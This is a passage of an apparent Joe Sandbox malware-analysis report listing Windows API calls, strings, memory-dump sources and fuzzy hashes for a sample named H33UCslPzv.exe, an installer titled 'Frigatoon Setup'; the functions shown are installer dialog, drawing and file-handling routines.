                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BB8
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C52
                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C82
                                                                    • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C96
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404CC4
                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CD2
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404CE2
                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DDD
                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E42
                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E57
                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E7B
                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E9B
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404EB0
                                                                  • GlobalFree.KERNEL32(?), ref: 00404EC0
                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F39
                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404FE2
                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FF1
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405011
                                                                  • ShowWindow.USER32(?,00000000), ref: 0040505F
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040506A
                                                                  • ShowWindow.USER32(00000000), ref: 00405071
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 2564846305-813528018
                                                                  • Opcode ID: 21134a8715fb0f3faf1c9c54640a0aa9d3ab0ad6357815c91f4f9f85ad6b74aa
                                                                  • Instruction ID: a268e52f59abad667f40846b9330857a26eef97fbfd8c04b7b0b2c1eeebe026e
                                                                  • Opcode Fuzzy Hash: 21134a8715fb0f3faf1c9c54640a0aa9d3ab0ad6357815c91f4f9f85ad6b74aa
                                                                  • Instruction Fuzzy Hash: 56026DB0900209EFEB109FA8DD45AAE7BB5FB84314F10813AF610B62E1D7789D52DF58
                                                                  APIs
                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404271
                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404285
                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042A3
                                                                  • GetSysColor.USER32(?), ref: 004042B4
                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042C3
                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042D2
                                                                  • lstrlenA.KERNEL32(?), ref: 004042D5
                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042E4
                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042F9
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040435B
                                                                  • SendMessageA.USER32(00000000), ref: 0040435E
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404389
                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043C9
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004043D8
                                                                  • SetCursor.USER32(00000000), ref: 004043E1
                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004043F7
                                                                  • SetCursor.USER32(00000000), ref: 004043FA
                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404426
                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040443A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                  • String ID: Call$N
                                                                  • API String ID: 3103080414-3438112850
                                                                  • Opcode ID: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                  • Instruction ID: a3db5b80d5f6c8d56f7a184239f37e003a0a90a84a660de175ffc46cbe068f47
                                                                  • Opcode Fuzzy Hash: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                  • Instruction Fuzzy Hash: D361B5B1A40204BFEF109F60DD45F6A7B69FB84704F10802AFB05BA1D1C7B8A951CF99
                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextA.USER32(00000000,Frigatoon Setup,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F$Frigatoon Setup
                                                                  • API String ID: 941294808-3691885874
                                                                  • Opcode ID: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                  • Instruction ID: 1ef7ef1d3183d2fe833be2fdc16277d02f602c466de40d92ea6efb336f18bcfe
                                                                  • Opcode Fuzzy Hash: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                  • Instruction Fuzzy Hash: 53417C71400249AFCB058FA5DE459BF7BB9FF45314F00802EF9A1AA1A0C778DA55DFA4
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DED,?,?), ref: 00405C8D
                                                                  • GetShortPathNameA.KERNEL32(?,007A12D8,00000400), ref: 00405C96
                                                                    • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
                                                                    • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D
                                                                  • GetShortPathNameA.KERNEL32(?,007A16D8,00000400), ref: 00405CB3
                                                                  • wsprintfA.USER32 ref: 00405CD1
                                                                  • GetFileSize.KERNEL32(00000000,00000000,007A16D8,C0000000,00000004,007A16D8,?,?,?,?,?), ref: 00405D0C
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D1B
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D53
                                                                  • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED8,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405DA9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405DBA
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DC1
                                                                    • Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 00405B8A
                                                                    • Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                  • String ID: %s=%s$[Rename]
                                                                  • API String ID: 2171350718-1727408572
                                                                  • Opcode ID: 57b324a61c57413be18c754cd008fd5a6ce2658ac10cbe97ee3ee47279fdbbb4
                                                                  • Instruction ID: 4ef5f1c50d251b73862b961a89edc9b2cc60572935cd21a4370a6936b8511f12
                                                                  • Opcode Fuzzy Hash: 57b324a61c57413be18c754cd008fd5a6ce2658ac10cbe97ee3ee47279fdbbb4
                                                                  • Instruction Fuzzy Hash: 5231F231201B15ABD2206B659D4DF6B3A6CDF86754F14053FFA01F62D2EA3CE8058EAD
                                                                  APIs
                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\H33UCslPzv.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                  • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\H33UCslPzv.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                  • CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406258
                                                                  • *?|<>/":, xrefs: 0040629F
                                                                  • "C:\Users\user\Desktop\H33UCslPzv.exe", xrefs: 00406293
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-1261868204
                                                                  • Opcode ID: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                  • Instruction ID: c458f316ef597d28f2da60d7b579c442bef5f501f0b3efb69703b1c7b5c33328
                                                                  • Opcode Fuzzy Hash: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                  • Instruction Fuzzy Hash: 2211E25180479129FB3226280C44FB77F984B9B770F1901BFD4C6722C2C67C5CA6826D
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004040FF
                                                                  • GetSysColor.USER32(00000000), ref: 0040413D
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404149
                                                                  • SetBkMode.GDI32(?,?), ref: 00404155
                                                                  • GetSysColor.USER32(?), ref: 00404168
                                                                  • SetBkColor.GDI32(?,?), ref: 00404178
                                                                  • DeleteObject.GDI32(?), ref: 00404192
                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040419C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                  • Instruction ID: 7e7a0635a9a9ad053635d0a61e184563e53fd5caf941e55c08cb8fd0a55be6c0
                                                                  • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                  • Instruction Fuzzy Hash: 312195715007049BD7309F68DD0CB5BBBF4AF91710B048A2EEA96A62E4C738D894CB54
                                                                  APIs
                                                                    • Part of subcall function 70021215: GlobalAlloc.KERNEL32(00000040,70021233,?,700212CF,-7002404B,700211AB,-000000A0), ref: 7002121D
                                                                  • GlobalFree.KERNEL32(?), ref: 700225DE
                                                                  • GlobalFree.KERNEL32(00000000), ref: 70022618
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                  • Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: 666da71ae62f53e939eeb41b5ec057c328ff0c18813e23c0ea7c9ee6df6abc0a
                                                                  • Instruction ID: ee581b5cd2ffcd3020efd9b74a9205194d665084d8d5e0e3347cddf6e36108da
                                                                  • Opcode Fuzzy Hash: 666da71ae62f53e939eeb41b5ec057c328ff0c18813e23c0ea7c9ee6df6abc0a
                                                                  • Instruction Fuzzy Hash: F641B172104610FFE3168FA4ECD8D2E77BAFB85B22B60852DF60186221D735A9059B71
                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049E9
                                                                  • GetMessagePos.USER32 ref: 004049F1
                                                                  • ScreenToClient.USER32(?,?), ref: 00404A0B
                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A1D
                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                  • Instruction ID: eb4189dc51e804bfd071b7650a20f4023a9ce92a25ebde304762d3f5d63b5794
                                                                  • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                  • Instruction Fuzzy Hash: A7019271E40218BADB00DB94DD81FFEBBBCAF55711F10012BBA00B61C0C7B455018F94
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
                                                                  • MulDiv.KERNEL32(00310551,00000064,00310555), ref: 00402D23
                                                                  • wsprintfA.USER32 ref: 00402D33
                                                                  • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402D2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
                                                                  • Instruction ID: 93681796157c975abd13c8aaf7f83402805495348c169d35143c581ed88c076c
                                                                  • Opcode Fuzzy Hash: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
                                                                  • Instruction Fuzzy Hash: 3001FF71640209BBEF109F60DE4AFEE3769EB04345F00803AFA16B51D0DBB999568F59
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00000000), ref: 70022447
                                                                    • Part of subcall function 70021224: lstrcpynA.KERNEL32(00000000,?,700212CF,-7002404B,700211AB,-000000A0), ref: 70021234
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 700223C2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 700223D7
                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 700223E8
                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 700223F6
                                                                  • GlobalFree.KERNEL32(00000000), ref: 700223FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                  • Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                  • String ID:
